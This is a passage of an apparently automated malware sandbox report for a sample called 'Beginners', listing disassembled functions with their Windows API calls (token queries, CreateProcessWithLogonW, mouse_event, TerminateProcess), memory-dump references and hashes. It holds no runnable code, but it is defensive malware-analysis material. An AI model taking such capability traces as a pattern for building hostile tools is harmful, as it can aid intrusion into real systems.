                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          • API String ID: 1827037458-0
                                          • Opcode ID: 4d5eb08884483636be9cc4e3524c22cc98ce43fa11e9a60f8e82ac554474c0ba
                                          • Instruction ID: 4d7d005e657c30a446e76ec9964c33b7d61684ae3c5bb1d7982e1f425a0e4684
                                          • Opcode Fuzzy Hash: 4d5eb08884483636be9cc4e3524c22cc98ce43fa11e9a60f8e82ac554474c0ba
                                          • Instruction Fuzzy Hash: 4241A131104200AFD711DF25CC98FEA7BF8EB49760F140569FA99972B2C7309885DB62
                                          Function 0013BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(001777B0,00000000,00C055F0,?,?,001777B0,?,0013BC1A,?,?), ref: 0013BD84
                                          • EnableWindow.USER32(?,00000000), ref: 0013BDA8
                                          • ShowWindow.USER32(001777B0,00000000,00C055F0,?,?,001777B0,?,0013BC1A,?,?), ref: 0013BE08
                                          • ShowWindow.USER32(?,00000004,?,0013BC1A,?,?), ref: 0013BE1A
                                          • EnableWindow.USER32(?,00000001), ref: 0013BE3E
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0013BE61
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: e5a39bfa2c6f9e14469777981f80407f8ac837254ecb75e14e89a327d0b73103
                                          • Instruction ID: 2b76070353539d3346690585d8f843c8749dad340638c820c01abdfa2e35ec80
                                          • Opcode Fuzzy Hash: e5a39bfa2c6f9e14469777981f80407f8ac837254ecb75e14e89a327d0b73103
                                          • Instruction Fuzzy Hash: D6416C35608144AFDB22CF68C4C9BD47BE1FF4A318F1841B9EB499F6A2DB31A845CB51
                                          Function 00127788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,0012550C,?,?,00000000,00000001), ref: 00127796
                                            • Part of subcall function 0012406C: GetWindowRect.USER32(?,?), ref: 0012407F
                                          • GetDesktopWindow.USER32 ref: 001277C0
                                          • GetWindowRect.USER32(00000000), ref: 001277C7
                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 001277F9
                                            • Part of subcall function 001157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00115877
                                          • GetCursorPos.USER32(?), ref: 00127825
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00127883
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                          • String ID:
                                          • API String ID: 4137160315-0
                                          • Opcode ID: abe0e2c25c8a63c90a72023e95b03efcd2bff486787b55f6bfad04f78b4eb407
                                          • Instruction ID: a1a8375576e0373bc6b8b372cb468e8d61af5b50550e1d9da8aa606f23a9bba6
                                          • Opcode Fuzzy Hash: abe0e2c25c8a63c90a72023e95b03efcd2bff486787b55f6bfad04f78b4eb407
                                          • Instruction Fuzzy Hash: AA31F032108315ABD720DF15D849F9BB7EAFF89314F00092AF99997191CB30E958CBA2
                                          Function 00109431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00108CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00108CDE
                                            • Part of subcall function 00108CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00108CE8
                                            • Part of subcall function 00108CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00108CF7
                                            • Part of subcall function 00108CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00108CFE
                                            • Part of subcall function 00108CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00108D14
                                          • GetLengthSid.ADVAPI32(?,00000000,0010904D), ref: 00109482
                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0010948E
                                          • HeapAlloc.KERNEL32(00000000), ref: 00109495
                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 001094AE
                                          • GetProcessHeap.KERNEL32(00000000,00000000,0010904D), ref: 001094C2
                                          • HeapFree.KERNEL32(00000000), ref: 001094C9
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 3008561057-0
                                          • Opcode ID: 5c846ccd28e335cf2ebf57bf9fcb59bda36fd6d0439172e3149a8097b9b4fc3c
                                          • Instruction ID: 957291d72ad46f344f91cbc899579d40969127814c1aa9169a62a6bd3cbe8f43
                                          • Opcode Fuzzy Hash: 5c846ccd28e335cf2ebf57bf9fcb59bda36fd6d0439172e3149a8097b9b4fc3c
                                          • Instruction Fuzzy Hash: EE11EE36500204FFDB118FA5CD29BAF7BA9FB4A312F108018F981D3261C7769941CB60
                                          Function 001091CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00109200
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00109207
                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00109216
                                          • CloseHandle.KERNEL32(00000004), ref: 00109221
                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00109250
                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00109264
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                          • String ID:
                                          • API String ID: 1413079979-0
                                          • Opcode ID: 772e8cd6c5bc2c9c1c669824567b52c1bb480ab370a69f94e15d1b4f5df09f62
                                          • Instruction ID: 817c216761bc87652085304c5cf597fc249c4a441375691998918408c9529d4e
                                          • Opcode Fuzzy Hash: 772e8cd6c5bc2c9c1c669824567b52c1bb480ab370a69f94e15d1b4f5df09f62
                                          • Instruction Fuzzy Hash: 7211897610024EBBDF028F94ED48FDE7BA8EF09304F044024FE45A20A1C3B28DA0EB60
                                          Function 0010C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0010C34E
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0010C35F
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0010C366
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0010C36E
                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0010C385
                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0010C397
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1035833867-0
                                          • Opcode ID: 78cd6a8a04b06c24e9fe20ccc35f7150d276818aefe90d9aef481fbb1a67790c
                                          • Instruction ID: a4956d321eda1fa7cee9d3deb8c9386e046cf4273dbb26d983bc4a2377abdf0b
                                          • Opcode Fuzzy Hash: 78cd6a8a04b06c24e9fe20ccc35f7150d276818aefe90d9aef481fbb1a67790c
                                          • Instruction Fuzzy Hash: 87014F75E00218BBEF119BA69C49B5EBFB8EF49761F004065FF08AB290D6709D10CFA0
                                          Function 0013C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1729
                                            • Part of subcall function 000B16CF: SelectObject.GDI32(?,00000000), ref: 000B1738
                                            • Part of subcall function 000B16CF: BeginPath.GDI32(?), ref: 000B174F
                                            • Part of subcall function 000B16CF: SelectObject.GDI32(?,00000000), ref: 000B1778
                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0013C57C
                                          • LineTo.GDI32(00000000,00000003,?), ref: 0013C590
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0013C59E
                                          • LineTo.GDI32(00000000,00000000,?), ref: 0013C5AE
                                          • EndPath.GDI32(00000000), ref: 0013C5BE
                                          • StrokePath.GDI32(00000000), ref: 0013C5CE
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                          • String ID:
                                          • API String ID: 43455801-0
                                          • Opcode ID: 7292ae5f94dd4471bff74ef8671a0a3672051133bf82edf92ff30442540428c8
                                          • Instruction ID: 3d84eb51cdec1876087f4b1b93fb1e7b493c370223e3b3608cfe429fe423d5d8
                                          • Opcode Fuzzy Hash: 7292ae5f94dd4471bff74ef8671a0a3672051133bf82edf92ff30442540428c8
                                          • Instruction Fuzzy Hash: 20110C7610010CBFDF129F91DC48EDA7F6DEB09354F048011BA1856571C771AD95DBA0
                                          Function 000D07BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000D07EC
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 000D07F4
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000D07FF
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000D080A
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 000D0812
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 000D081A
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          • Opcode ID: 622842c7148dfe9d98a50e4ff746bcd1fb0a0c6afe322ab83af5dcf8c4e4eb62
                                          • Instruction ID: c0398f7881e84b51e4dc1405136f52c78081a1e1e5f6708c777a0719fcf0be52
                                          • Opcode Fuzzy Hash: 622842c7148dfe9d98a50e4ff746bcd1fb0a0c6afe322ab83af5dcf8c4e4eb62
                                          • Instruction Fuzzy Hash: 8F016CB09027597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5
                                          Function 001159A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001159B4
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001159CA
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 001159D9
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001159E8
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001159F2
                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001159F9
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          • Opcode ID: 8f73bcc7d3df32a7de61d5ee00a70fbb7597e452b341f61f407d7f786705485f
                                          • Instruction ID: 7c0c834e24880fca3a31c498df34e70bc09ab938c01be9e338db4e0f231b65a3
                                          • Opcode Fuzzy Hash: 8f73bcc7d3df32a7de61d5ee00a70fbb7597e452b341f61f407d7f786705485f
                                          • Instruction Fuzzy Hash: 6DF06D36240158BBE3225B939C0DEEF7E3CEBCBB21F000159FA0591460E7B01A9186B5
                                          Function 001177EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 001177FE
                                          • EnterCriticalSection.KERNEL32(?,?,000BC2B6,?,?), ref: 0011780F
                                          • TerminateThread.KERNEL32(00000000,000001F6,?,000BC2B6,?,?), ref: 0011781C
                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,000BC2B6,?,?), ref: 00117829
                                            • Part of subcall function 001171F0: CloseHandle.KERNEL32(00000000,?,00117836,?,000BC2B6,?,?), ref: 001171FA
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0011783C
                                          • LeaveCriticalSection.KERNEL32(?,?,000BC2B6,?,?), ref: 00117843
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: 03c2dc253291e446b3b6586c22516aedaf0dbe69d03b5905aeb8610678f765b7
                                          • Instruction ID: c84755ea41505b7cb8554449d2cab382873f615635ebe2038c4368a698a0df54
                                          • Opcode Fuzzy Hash: 03c2dc253291e446b3b6586c22516aedaf0dbe69d03b5905aeb8610678f765b7
                                          • Instruction Fuzzy Hash: 89F0583A155212ABD7162B65EC8CEEB7B79FF4A702B140825F203A59F0CBB55881CB60
                                          Function 0010954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00109555
                                          • UnloadUserProfile.USERENV(?,?), ref: 00109561
                                          • CloseHandle.KERNEL32(?), ref: 0010956A
                                          • CloseHandle.KERNEL32(?), ref: 00109572
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0010957B
                                          • HeapFree.KERNEL32(00000000), ref: 00109582
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: 0607d96759530bea3262d400c132741cefa4ca730696323c6f2a66772244d45c
                                          • Instruction ID: cf8978f7c66ca52cc4508e1004bfe5585bc608d300326b0ccbd271877bdb39cd
                                          • Opcode Fuzzy Hash: 0607d96759530bea3262d400c132741cefa4ca730696323c6f2a66772244d45c
                                          • Instruction Fuzzy Hash: 38E0E53A004141BFDB021FE2EC0C95ABF39FF4EB22B104620F71581870CB32A4A0DB50
                                          Function 00128CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00128CFD
                                          • CharUpperBuffW.USER32(?,?), ref: 00128E0C
                                          • VariantClear.OLEAUT32(?), ref: 00128F84
                                            • Part of subcall function 00117B1D: VariantInit.OLEAUT32(00000000), ref: 00117B5D
                                            • Part of subcall function 00117B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00117B66
                                            • Part of subcall function 00117B1D: VariantClear.OLEAUT32(00000000), ref: 00117B72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4237274167-1221869570
                                          • Opcode ID: dbb72609e58c4c4173612aeeb4e72843cb361a11de743fc32944ff0dc916cd5e
                                          • Instruction ID: 87e9108ad0eec4640e449719f61b27cfc4af31ecdf551318032df13ab991439b
                                          • Opcode Fuzzy Hash: dbb72609e58c4c4173612aeeb4e72843cb361a11de743fc32944ff0dc916cd5e
                                          • Instruction Fuzzy Hash: A5919D756083019FC704DF24D481D9ABBF5EF99314F14896EF88A8B3A2DB30E945CB52
                                          Function 0011323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C436A: _wcscpy.LIBCMT ref: 000C438D
                                          • _memset.LIBCMT ref: 0011332E
                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0011335D
                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00113410
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0011343E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                          • String ID: 0
                                          • API String ID: 4152858687-4108050209
                                          • Opcode ID: 39954df7b059cea4af03d598c600ed7232f512bafcf58723a06257d4aaff29c5
                                          • Instruction ID: fd9034d8923d7b54e8df3843d399d17f60e7b1e3dc3f8388d8fe8e1ad9e02b1b
                                          • Opcode Fuzzy Hash: 39954df7b059cea4af03d598c600ed7232f512bafcf58723a06257d4aaff29c5
                                          • Instruction Fuzzy Hash: CA51C4316083019BD71AAF28D8456EBBBE8AF45320F04453DF8A5D35E5DB70CE84CB56
                                          Function 00112EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00112F67
                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00112F83
                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00112FC9
                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00177890,00000000), ref: 00113012
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          • Opcode ID: 9730f9ea9da15c2a5377e910d3e17c267c3e9d94e747f4f954ec72343328be7f
                                          • Instruction ID: c29765c3161a21795aa18a5a45e15c19e5d75e95622aeb7a152e74d90437c21f
                                          • Opcode Fuzzy Hash: 9730f9ea9da15c2a5377e910d3e17c267c3e9d94e747f4f954ec72343328be7f
                                          • Instruction Fuzzy Hash: A341D5312083419FD728DF24C884F9ABBE4EF89310F104A2EF565972D1D770EA85CB62
                                          Function 00109A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00109ACC
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00109ADF
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00109B0F
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$_memmove$ClassName
                                          • String ID: ComboBox$ListBox
